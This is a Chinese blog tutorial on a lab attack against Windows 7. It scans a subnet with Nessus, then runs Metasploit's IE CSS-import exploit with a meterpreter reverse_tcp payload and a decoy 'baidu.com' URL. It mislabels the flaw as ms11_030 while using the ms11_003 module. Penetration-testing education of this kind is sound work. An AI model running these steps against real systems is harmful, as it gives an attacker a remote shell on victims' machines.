metasploit攻击win7

本实验使用到的工具为nessus 、win7\kali

首先。获得靶机ip(10.1.1.129)
关闭win7防火墙

攻击开始:
在Kali上启动nussus服务(/etc/init.d/nessusd start)
访问Nessus控制端https://127.0.0.1:8834/
在这里插入图片描述在这里插入图片描述
使用nusses的作用是对靶机进行扫描,寻找它可以利用的漏洞
新建一个扫描,依次选择“New Scan”-“Basic Network Scan”
在这里插入图片描述
配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描

在这里插入图片描述
扫描结束后,Nessus会很直观的显示出目标网段的安全情况。下图显示了整个网段的安全信息。Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。
在这里插入图片描述
重点关注10.1.1.129
点击就完了 有一个漏洞可以利用 ms11_030

在kali启动metasploit 输入msfconsole
运行命令 use exploit/windows/browser/ms11_003_ie_css_import 选择漏洞利用EXP
在这里插入图片描述
查看配置选项
设置生成的恶意网络 set URIPATH baidu.com
设置服务器端口为8060 set SRVPORT 8060
设置攻击负载 set PAYLOAD windows/meterpreter/reverse_tcp
设置LHOST绑定本地IP set LHOST 10.1.1.128
设置LHOST set LPORT 8866
开始攻击 exploit
在靶机打开IE 输入http://10.1.1.128:8060/baidu.com

然后kali上出现这样的东西就说明攻击成功

在这里插入图片描述
https://www.pianshen.com/article/7145927/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值